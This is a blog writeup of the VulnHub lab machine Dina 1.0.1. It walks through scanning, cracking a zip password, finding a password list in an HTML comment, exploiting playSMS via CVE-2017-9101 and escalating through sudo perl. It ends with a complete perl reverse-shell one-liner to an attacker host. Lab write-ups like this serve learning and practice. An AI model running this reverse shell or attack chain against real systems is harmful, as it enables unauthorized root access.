Dina 1.0.1 Writeup - MikeLizotte

In this Writeup, I will go through Dina 1.0 made by Touhid Shaikh available for free on VulnHub.

I start by finding the target’s IP address. `netdiscover -r 10.0.3.0/24`

Seems like there is only one port open. 80 is usually a website.

Next i use dirbuster to list the website’s folders.

Found a couple folders. Let’s try them out!

/secure contains a file names “backup.zip”. I download it to see what it contains.

The zip has a mp3 file in it which i can’t access because it is password protected.

Let’s try cracking it! I use zip2john to convert the file into a hash. Then I use john to crack it.

This is interesting and funny. I extract it and try to read strings in it.

I totally agree with touhid :P. It also reveals another folder.

/nothing appears to be an improvised “not found” page. Let’s check source code.

<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>

Looks like we found touhid’s password list!

Finally, going to /SecreTSMSgatwayLogin reveals “playSMS’ web application. Let’s try logging in.

Success! Using username touhid and a password found in the list earlier i logged in. Now let’s see if there are any known vulns.

https://github.com/jasperla/CVE-2017-9101 reveals a nice python script which should abuse an exploit and give us a reverse shell!

sudo -l reveals something we might use to escalate

We might be able to run perl a root. Let’s try!

First start a listener on our local machine.

Now let’s try a nice perl reverse shell script.

perl -e 'use Socket;$i="10.0.3.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Leave a Reply Cancel reply